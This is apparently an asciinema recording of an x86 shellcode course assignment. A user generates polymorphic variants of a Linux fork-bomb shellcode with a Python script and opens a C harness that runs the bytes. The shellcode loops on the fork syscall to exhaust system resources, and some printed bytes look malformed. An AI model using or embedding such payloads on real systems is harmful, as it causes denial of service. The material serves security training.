{"version": 2, "width": 80, "height": 24, "timestamp": 1534945515, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.022131, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1004h\u001b[c\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;24r\u001b]112\u0007\u001b[9;4H\u001b[?2004h\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xc3\\x18\\x5a\\xc4\\xe2\\x70\\xf2\\xc9\\x29\\xc0\\xb0\\x1\\x2c\\x-1\\xb0\\x02\\xcd\\x80\\xeb\\xeb\u001b[K\r\nLength:  20\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[0.031806, "o", "\u001b(B\u001b[m\u001b[?12;25h\u001b[?12l\u001b[?25h\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[1;1H\u001b[1;24r\u001b[9;4H\u001b[?2004h"]
[0.032833, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xc3\\x18\\x5a\\xc4\\xe2\\x70\\xf2\\xc9\\x29\\xc0\\xb0\\x1\\x2c\\x-1\\xb0\\x02\\xcd\\x80\\xeb\\xeb\u001b[K\r\nLength:  20\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m "]
[0.033785, "o", "% \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[0.118072, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xc3\\x18\\x5a\\xc4\\xe2\\x70\\xf2\\xc9\\x29\\xc0\\xb0\\x1\\x2c\\x-1\\xb0\\x02\\xcd\\x80\\xeb\\xeb\u001b[K\r\nLength:  20\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m "]
[0.122728, "o", "% \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[0.229604, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xc3\\x18\\x5a\\xc4\\xe2\\x70\\xf2\\xc9\\x29\\xc0\\xb0\\x1\\x2c\\x-1\\xb0\\x02\\xcd\\x80\\xeb\\xeb\u001b[K\r\nLength:  20\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m "]
[0.229884, "o", "% \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;245m\u001b[48;5;232m                                                                                \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[0.231127, "o", "\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;4H\u001b[?12l\u001b[?25h"]
[1.191724, "o", "c"]
[1.292619, "o", "\bcl"]
[1.420344, "o", "e"]
[1.565067, "o", "a"]
[1.684729, "o", "r"]
[1.869656, "o", "\u001b[1;23r\u001b[2;23r\u001b[22S\u001b[1;1H\u001b[K\u001b[1;24r\u001b[1;1H\u001b[?2004l"]
[1.86997, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[1;1H \u001b[H"]
[1.871205, "o", "\u001b[1;23r\u001b[2;23r\u001b[22S\u001b[1;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b[1;24r\u001b[1;60H\u001b(B\u001b[m"]
[1.871404, "o", "\r\n"]
[1.871561, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[1.871711, "o", "\u001b[K"]
[1.871974, "o", "\u001b[?2004h"]
[2.332404, "o", "."]
[2.837101, "o", "\b./"]
[4.158919, "o", "f"]
[4.26908, "o", "o"]
[4.372206, "o", "r"]
[4.575008, "o", "k"]
[6.237424, "o", "_"]
[7.180538, "o", "f"]
[7.563942, "o", "\u0007"]
[7.564248, "o", "\bbomb.py"]
[7.564439, "o", "\r"]
[7.564589, "o", "\r\n"]
[7.564769, "o", "Completing corrections"]
[7.56491, "o", "\r\n"]
[7.565063, "o", "\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*             \u001b[32m\u001b[1mfork_no_equivalent.cast\u001b(B\u001b[m*  \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*          "]
[7.565204, "o", "\r\n"]
[7.565339, "o", "Completing original"]
[7.565471, "o", "\r\n"]
[7.565618, "o", "\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;1H\u001b[K./fork_f\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;9H\u001b[K\u001b[1;24r\u001b[2;4H"]
[7.565769, "o", "./fork_bomb.py\u001b[K"]
[8.711191, "o", " "]
[9.036926, "o", "-"]
[10.073925, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -\u001b[K\r\nCompleting corrections\u001b[K\r\n\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*             \u001b[32m\u001b[1mfork_no_equivalent.cast\u001b(B\u001b[m*  \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*\u001b[K\r\nCompleting original\u001b[K\r\n./fork_f\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m "]
[10.07423, "o", "\u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;20H\u001b[?12l\u001b[?25h"]
[10.140662, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -\u001b[K\r\nCompleting corrections\u001b[K\r\n\u001b[32m\u001b[1mfork_bomb.py\u001b(B\u001b[m*             \u001b[32m\u001b[1mfork_no_equivalent.cast\u001b(B\u001b[m*  \u001b[32m\u001b[1mfork_nop.cast\u001b(B\u001b[m*\u001b[K\r\nCompleting original\u001b[K\r\n./fork_f\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m "]
[10.140948, "o", "\u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[2;20H\u001b[?12l\u001b[?25h"]
[10.431903, "o", "m"]
[10.893454, "o", "\u001b[1;23r\u001b[4;23r\u001b[20S\u001b[3;1H\u001b[K\u001b[1;24r\u001b[3;1H\u001b[?2004l"]
[10.973533, "o", "Shellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b]0;SLAE ❐ SLAE ● 1 python\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mthon \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:4"]
[10.973834, "o", "5 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[4;9H\u001b[?12l\u001b[?25h"]
[10.98015, "o", "\r\nLength:  19\r\n"]
[10.984172, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                               \u001b[6;1H \r"]
[11.000422, "o", "\u001b[1;23r\u001b[7;23r\u001b[17S\u001b[6;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\r\n\u001b[37m % \u001b(B\u001b[m\u001b[K\u001b[1;24r\u001b[7;4H\u001b[?2004h"]
[11.101454, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m"]
[11.102859, "o", "\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mthon \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;4H\u001b[?12l\u001b[?25h"]
[11.20384, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m"]
[11.204128, "o", "\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1mthon \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;4H\u001b[?12l\u001b[?25h"]
[15.054074, "o", "\u001b]0;SLAE ❐ SLAE ● 1 zsh\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;4H\u001b[?12"]
[15.054581, "o", "l\u001b[?25h"]
[15.054823, "o", "v"]
[15.148681, "o", "\bvi"]
[15.182515, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvi\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b"]
[15.182996, "o", "[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;6H\u001b[?12l\u001b[?25h"]
[15.274347, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./fork_bomb.py -m\u001b[K\r\nShellcode:  \\x83\\xe9\\x33\\x29\\xc0\\xb0\\xde\\x2c\\xdc\\x6a\\x0b\\x6a\\x02\\xb0\\x02\\xcd\\x80\\xeb\\xed\u001b[K\r\nLength:  19\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/fork\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvi\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b"]
[15.274685, "o", "[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[7;6H\u001b[?12l\u001b[?25h"]
[15.35762, "o", "m"]
[15.413485, "o", " "]
[15.500141, "o", "s"]
[15.612323, "o", "h"]
[15.732887, "o", "ellcode"]
[16.117003, "o", "."]
[16.268844, "o", "c"]
[16.438805, "o", "\r\n\u001b[?2004l"]
[16.500524, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[8d\u001b[?12l\u001b[?25h"]
[16.50235, "o", "\u001b[1;23r\u001b[2;23r\u001b[22S\u001b[1;1H\u001b[K\u001b[1;24r\u001b[1;1H"]
[16.50872, "o", "\u001b[23d\"shellcode.c\"\u001b[?25l"]
[16.509479, "o", " 18L, 319C"]
[16.526207, "o", "\u001b[H\u001b[34m/*\r\n * Put your assembler file here\r\n */\u001b[5;1H\u001b[35m#include\u001b[31m<stdio.h>\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[8;1H\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[9;24H\u001b[31m\"\u001b[35m\\x5a\\x29\\xc0\\xb0\\x15\\x2c\\x13\\x59\\x6a\\x39\\xb0\\x02\\xcd\\x800\r\\xeb\\xf0\u001b[31m\"\u001b[39m;\u001b[12;1H\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\r\n{\u001b[14;9Hprintf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[15;9H\u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[16;9Hret();\r\n}\u001b[20;1H\u001b[94m~                                                                               \u001b[21;1H~                                                                               \u001b[22;1H~                                                                               \u001b[23;63H\u001b[39m9,76-90\u001b[7CAll\u001b[10;10H\u001b[?12l\u001b[?25h"]
[17.541977, "o", "\u001b]0;SLAE ❐ SLAE ● 1 vim\u0007\u001b[?25l\u001b[24;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 4h 12m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;245m<\u001b[38;5;16m\u001b[48;5;39m\u001b[1m vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◼\u001b[38;5;220m◼\u001b[38;5;226m◼\u001b[38;5;190m◼\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;190m 68% \u001b[38;5;245m| 15:45 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;10H\u001b[?"]
[17.551934, "o", "12l\u001b[?25h"]
[17.552571, "o", "\u001b[23;53Hd\u001b[10;10H"]
[17.639712, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x5a\\x29\\xc0\\xb0\\x15\\x2c\\x13\\x59\\x6a\\x39\\xb0\\x02\\xcd\\x80\\xeb\\xf0\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n        printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, st"]
